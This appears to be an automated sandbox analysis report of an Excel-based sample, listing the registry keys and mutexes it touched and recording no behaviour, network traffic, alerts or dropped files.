HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9DEBA2EE-C7E4-47AE-85D5-56C59D090DA5}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{AF86E2E0-B12D-4c6a-9C5A-D7AA65101E90}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{801156FD-7E96-4274-821E-96D94E0C2B1F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CE4B87D-0ABF-4E76-A557-A2082325270A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\DontUseArchive

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\3476
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\3476\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\4$l
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SessionId
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\idp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F386A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F386A\23F386A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\FileTypeBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverterBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle\ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F3A4E
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F3A4E\23F3A4E
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\LastPurgeTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ActivityDataModel\ReaderRevisionInfo\112DF3B9-46FD-489C-9225-38E8C540F72A
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\WRT:windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel+1+00000000000201CE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\WRT:windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel+1+00000000000201CE\ShowInSwitchers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\WRT:windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel+1+00000000000201CE\VirtualDesktop
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel\PreferredMinSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\jvaqbjf.vzzrefvirpbagebycnary_pj5a1u2gklrjl!zvpebfbsg.jvaqbjf.vzzrefvirpbagebycnary
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\splwow64.exe\JScriptSetScriptStateStarted

HKEY_CURRENT_USER\Software\Microsoft\Office\Common\GracefulExit\EXCEL\2840\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\4$l
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F386A\23F386A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\idp

C:\Windows\splwow64.exe 8192

Global\ClickToRunPackageLocker
Local\SM0:3476:168:WilStaging_02
Office16.B1E641B5-F92B-4B82-83B7-10DC868435E8
Local\10MU_ACBPIDS_S-1-5-5-0-239466
Local\10MU_ACB10_S-1-5-5-0-239466
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Local\SessionImmersiveColorMutex
_ClassificationAuditCacheMutex_
{540C3015-CFCF-4C7C-85E7-E18AD81E4A31}16ContentAnonymousInsights.json
Local\SM0:3476:64:WilError_03
Local\MSCTF.Asm.MutexDefault1
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
Global\552FFA80-3393-423d-8671-7BA046BB5906
Local\F99C425F-9135-43ed-BD7D-396DE488DC53_Office16
Global\MTX_MSO_Formal1_S-1-5-21-932793227-1321892499-785312009-1001
Global\MTX_MSO_AdHoc1_S-1-5-21-932793227-1321892499-785312009-1001
Local\Microsoft_Office_UsageMetricsStoreFileStore_16
Local\UsageMetrics_NLMicrosoft_Office_16_3319437661
Local\UsageMetrics_NLMicrosoft_Office_16_1636748217
Local\StorageWin32Mutex_Microsoft_Office_16_NamespaceLifecycle_3192105584
Local\Disco_Microsoft_Office_16_Catalog
Local\Disco_Microsoft_Office_16_MappingLock
Local\Disco_Shm_Microsoft_Office_16_MA_244114e7
Local\Storage_Microsoft_Office_16_NM_Seq_4e537u69913576p
Local\Disco_Shm_Microsoft_Office_16_MA_90a23ea2
Local\WinSpl64To32Mutex_3a90d_0_2000
Local\SM0:4804:120:WilError_03
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer
Global\C::Users:user:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!018
Local\SM0:3304:304:WilStaging_02

No results

Sorry! No behavior.

Sorry! No tracee.

Sorry! No strace.

Sorry! No tracee.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.

Sorry! No dropped files.

Sorry! No process dumps.